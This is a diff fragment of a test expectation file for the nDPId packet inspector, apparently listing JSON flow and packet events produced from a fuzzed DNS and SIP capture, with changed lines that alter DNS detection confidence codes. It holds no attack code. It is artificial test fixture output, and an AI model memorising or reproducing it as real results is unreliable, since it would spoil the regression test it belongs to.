+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybevcity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847669,"flow_last_seen":1120469847669,"flow_idle_time":620000,"flow_min_l4_payload_len":475,"flow_max_l4_payload_len":475,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":120,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847669,"flow_last_seen":1120469847669,"flow_idle_time":620000,"flow_min_l4_payload_len":475,"flow_max_l4_payload_len":475,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":120,"flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1120470456151,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470456151,"pkt":"ADBUADRWAODtAW69CABFAABEa1kAAIARS\/zAqAECwKgBAwriADUAMED14+cAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZKxyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470456152} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470456151,"pkt":"AODtAW69ADBUADRWCABFAABbAABACEARtz7AqAEBwKgBAgA1CuIARyNx4+eAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470456286,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1120470456286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470456286,"pkt":"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"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1120470456513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470456513,"pkt":"ADBUADRWAODtAW69CABFAABIa1sAAIARS\/bAqAECwKgDAQrjADU0NPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1120470457512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470457512,"pkt":"ADBUADRWAODtAW69CABFAABIa1wAAIARS\/XAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABFtzaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1120470459516,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470459516,"pkt":"ADBUAjRWAODtAW69CABFAABIa10AAIARS\/TAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":3,"flow_last_seen":1120470461518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470461518,"pkt":"ADBUADRWAODtAW69CABFAABIa14AAFMRS\/PAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcAPDaXAJa3liZXJtaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470457512,"flow_last_seen":1120470461518,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470461518,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.?ip.kybermity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":427,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470457512,"flow_last_seen":1120470461518,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470461518,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.?ip.kybermity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":427,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -801,7 +801,7 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1120470473526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470473526,"pkt":"ADBUADRWAODtAW69CABFAABEa2AAAIARS\/XAqAECwKgBAQrkADUAMLnxaukAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 
-00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473527,"flow_last_seen":1120470473527,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470473527,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1120470473527,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470473527,"pkt":"AODtAW69ADBUADRWCABFAABbAABAJXMAtz7AqAEBwKgBAgA1CuQAR5xtaumAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3Qw"} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":431,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2157,"global_ts_msec":1120470473631} 
@@ -810,51 +810,51 @@ 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":432,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470473529,"pkt":"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"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1120470474627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470474627,"pkt":"ADBUADRWAODtAW69CABFAABIa2MAAIARS+7AqAECwKgBAQrlADUANLH1d+oBgAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 